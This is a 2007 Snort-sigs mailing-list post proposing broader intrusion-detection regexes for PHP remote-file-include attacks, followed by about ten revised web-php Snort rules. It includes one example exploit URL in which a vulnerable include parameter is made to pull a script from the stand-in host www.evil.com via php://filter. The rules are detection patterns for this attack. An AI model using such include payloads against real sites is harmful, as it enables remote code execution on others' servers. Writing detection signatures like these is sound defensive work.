[Snort-sigs] PHP remote include sigs (part I)

Jamie Riden jamie.riden at ...2420...
Wed May 30 05:56:49 EDT 2007


Hi there,

A lot of the PHP remote file include sigs have matches like
pcre:"/=\s*(https?|ftp)\:\//Ui", and some without the /i modifier,
some without the /U.

It turns out that PHP also ships with the following URL schemes
enabled by default:

php://filter/resource=http://www.example.com and
ftps://ftp.example.com - a brief test seems to confirm that these work
just as well as http for file inclusion.

ie. an exploit URL would be something like :
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com/script.txt

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions. I have tested this briefly, but a
sanity check would be welcome.

cheers,
 Jamie

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP remote include path";
flow:established,to_server; uricontent:".php"; content:"path=";
pcre:"/path=\s*(https?|php|ftps?)\:\//Ui"; classtype:web-application-attack;
sid:2002; rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHP-Nuke remote file include
attempt"; flow:to_server,established; uricontent:"/index.php"; nocase;
content:"file="; pcre:"/file=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,3889; reference:cve,2002-0206;
classtype:web-application-attack; sid:1399; rev:12;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP b2 cafelog gm-2-b2.php remote
file include attempt"; flow:to_server,established;
uricontent:"/gm-2-b2.php"; content:"b2inc=";
pcre:"/b2inc=\s*(https?|php|ftps?)\:\//Ui"; reference:nessus,11667;
classtype:web-application-attack; sid:2143; rev:4;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP BLNews objects.inc.php4 remote
file include attempt"; flow:to_server,established;
uricontent:"/objects.inc.php4"; content:"Server[path]=";
pcre:"/Server\x5bpath\x5d=(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7677; reference:cve,2003-0394;
reference:nessus,11647; classtype:web-application-attack; sid:2147;
rev:8;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ttCMS header.php remote file
include attempt"; flow:to_server,established;
uricontent:"/admin/templates/header.php"; content:"admin_root=";
pcre:"/admin_root=(https?|php|ftps?)\:\//Ui"; reference:bugtraq,7542;
reference:bugtraq,7543; reference:bugtraq,7625;
reference:nessus,11636; classtype:web-application-attack; sid:2150;
rev:8;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ttforum remote file include
attempt"; flow:to_server,established; uricontent:"forum/index.php";
content:"template="; pcre:"/template=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7542; reference:bugtraq,7543;
reference:nessus,11615; classtype:web-application-attack; sid:2155;
rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP pmachine remote file include
attempt"; flow:to_server,established; uricontent:"lib.inc.php";
content:"pm_path="; pcre:"/pm_path=(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7919; reference:nessus,11739;
classtype:web-application-attack; sid:2226; rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP gallery remote file include
attempt"; flow:to_server,established; uricontent:"/setup/";
content:"GALLERY_BASEDIR=";
pcre:"/GALLERY_BASEDIR=\s*(https?|php|ftps?)\:\//Ui"; reference:bugtraq,8814;
reference:nessus,11876; classtype:web-application-attack; sid:2306;
rev:5;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PayPal Storefront remote file
include attempt"; flow:to_server,established; content:"do=ext";
content:"page="; pcre:"/page=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,8791; reference:nessus,11873;
classtype:web-application-attack; sid:2307; rev:7;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Opt-X header.php remote file
include attempt"; flow:to_server,established;
uricontent:"/header.php"; nocase; content:"systempath=";
pcre:"/systempath=\s*(https?|php|ftps?)\:\//Ui"; reference:bugtraq,9732;
classtype:web-application-attack; sid:2575; rev:2;)

-- 
Jamie Riden, CISSP / jamesr at ...3216... / jamie at ...3294...
UK Honeynet Project: http://www.ukhoneynet.org/




More information about the Snort-sigs mailing list